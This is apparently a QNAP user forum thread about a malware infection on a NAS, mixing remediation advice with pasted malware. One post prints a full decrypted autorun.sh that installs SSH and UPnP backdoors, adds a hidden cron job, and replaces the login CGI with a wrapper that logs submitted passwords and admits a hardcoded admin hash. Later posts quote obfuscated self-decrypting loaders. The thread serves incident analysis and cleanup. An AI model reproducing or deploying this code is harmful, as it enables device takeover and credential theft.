- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gaped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:Code: Select all
#!/bin/sh export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin" command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; } test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; } command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\ \['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\ //I;s/\(^\|\ \)\[[^\ ]\+\]\ .*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; } bdir= test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done; test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1` test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done; test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; } arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm` upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR") cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB") sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT") sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb") sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox") sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH") archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn") archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr") ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB") crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY") arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"` test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || { mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } __BOOT_DEV= __model=`getcfg System "Internal Model"` CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf` CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf` CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf` __BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); } test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6" test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; } for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; } test "$noex" = 1 || { rm "${bdir}/.BOOT_TIME" rm .BOOT_TIME test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}" tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"` test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done; test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd` cp "${arch}" ${tdir} cd ${tdir} tar -xzf "${arch}" grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; } EOF test "$fgrep" || fgrep=grep test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}" test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}" test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; } cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; } chmod 755 "${bdir}/.${ipath}/${crons}.sh" if [ -f "${confdir}/crontab" ]; then test "$RANDOM" || RANDOM=12499 test $(( $RANDOM & 1 )) = 0 && space=' ' || space='' cronmins="$(( $RANDOM % 4 ))" test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" $fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; } fi for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done chmod 755 "${bdir}/.${ipath}/${sshbin}" chmod 755 "${bdir}/.${ipath}/${upnpbin}" grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && { ! test -d "${bdir}/.log" && mkdir "${bdir}/.log" ! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh POSTDATA="" test "x${REQUEST_METHOD}" = xPOST && { case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac; $REMOTE_ADDR:$POSTDATA EOF } test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && { case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0 } if ! test -z "$POSTDATA"; then exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc $POSTDATA V4KLDmYwvc else exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi fi exit 0' > /home/httpd/cgi-bin/_authLogin.cgi test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi } . "${bdir}/.${ipath}/${crons}.sh" cd "${sdir}" rm -rf "${tdir}" test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } true; } #]
unfortunately i dosomy1982 wrote:Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.somy1982 wrote:Can you tell us how to "decrypt" the shell script? Id like to look into mine and see if I can find anything myself.
Code: Select all
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Code: Select all
#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
Code: Select all
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Code: Select all
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.I don't get the point why to disconnect from LAN?
Check all apps under .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones malware remover claimed recovered!! When exactly on 25/8 did the file created? Mine wa around 9am Europe time.benzo83 wrote:unfortunately i dosomy1982 wrote:Do you have music station installed and enabled?benzo83 wrote:not too cheap 300euro :/dolbyman wrote:8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
Thanks, have done that and removed the autorun.sh. Delete everything I could find and also removed all suspicious cron jobs. The NAS is restarted and the jobs are removed permanently seems.Mousetick wrote:Also, go to Control Panel > System > Hardware, and on the "General" tab, make sure the box "Run user defined processes during startup" is unchecked. Restart the NAS afterwards.
This doesn't "clean" or remove anything, this just prevents a malicious autorun.sh from being executed at startup. If the NAS is already infected by malware with a malicious autorun.sh, it's already too late, it remains in place along with the malware payload and all the other stuff that the malware has already installed in various places. But at least this should prevent the malware from re-installing itself while the NAS is being cleaned.